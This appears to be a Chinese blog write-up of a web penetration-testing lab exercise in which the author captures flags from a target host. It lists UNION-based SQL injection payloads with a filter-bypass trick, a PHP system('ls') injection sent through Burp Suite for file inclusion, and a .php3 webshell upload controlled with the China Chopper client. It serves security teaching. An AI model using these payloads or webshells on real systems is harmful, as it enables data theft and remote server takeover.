基本的WEB渗透测试

基本的WEB渗透测试


实验要求

1. 对靶机进行注入攻击获取数据库数据信息(flag{xxx}) 2. 通过文件包含获取敏感数据(某路径下F1a9文件) 3.寻找文件上传点并尝试绕过实现木马上传实现远程控制靶机(获取某文件内容flag{xxxx})

一、SQL注入

1.1 查询当前连接的数据库,输入命令-1’ UNION SELECT 1, database()#。
1
1.2 查询服务器上所有的数据库,输入命令-1’ UNION SELECT SCHEMA_NAME,SCHEMA_NAME from infoorrmation_schema.SCHEMATA#。
2
1.3 查询Flag_db数据库具有的表,输入命令-1’ UNION SELECT 1, table_name from infoorrmation_schema.tables where table_schema=‘Flag_db’#。
3
1.4 查询FlA9_t0b具有的列,输入命令-1’ UNION SELECT 1, column_name FROM infoorrmation_schema.columns WHERE table_name=‘FlA9_t0b’#。
4
1.5 查询FlA9_t0b中存储的FLAG,输入命令-1’ UNION SELECT fLa9_col,fLa9_col from Flag_db.FlA9_t0b#,得到爆破后的flag。
5

二、File_include(文件包含):

原理:开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞;

  1. 打开浏览器网页选项手动配置HTTP代理为127.0.0.1,端口号为8080,如图所示。

2.打开Burp Suite对靶机地址http://112.48.19.44:8002/进行访问完成拦截。
7
3.当我们点击【Forward】之后,我们将看到这次请求返回的所有数据。
8
4. 在burpsuite中修改request,并在最后一行加上命令<?php system(‘ls’)?>。
9
5. 点击“Go”后,得到response,发现“F1a9”文件。
10
6. 修改访问网址http://112.48.19.44:8002/file=F1a9,爆出flag。
11


三、File_upload(文件上传):

  1. 创建hhh.php文件,密码设为8888:
    12
  2. 访问靶机,查看代码中发现不允许上传php后缀文件,将hhh.php文件后缀改为php3:
    13
  3. 在靶机上传hhh.php3文件后,检查网页元素,找到文件上传后的地址。
    14
  4. 打开中国菜刀,添加文件网址,密码8888,类别设置为php文件。
    15
  5. 通过菜刀访问网址,找到“f1a9”文件。
    16
  6. 打开f1a9_upload.txt文件得到爆破的flag。
    17

猜你喜欢

转载自blog.csdn.net/weixin_43367971/article/details/120616102
今日推荐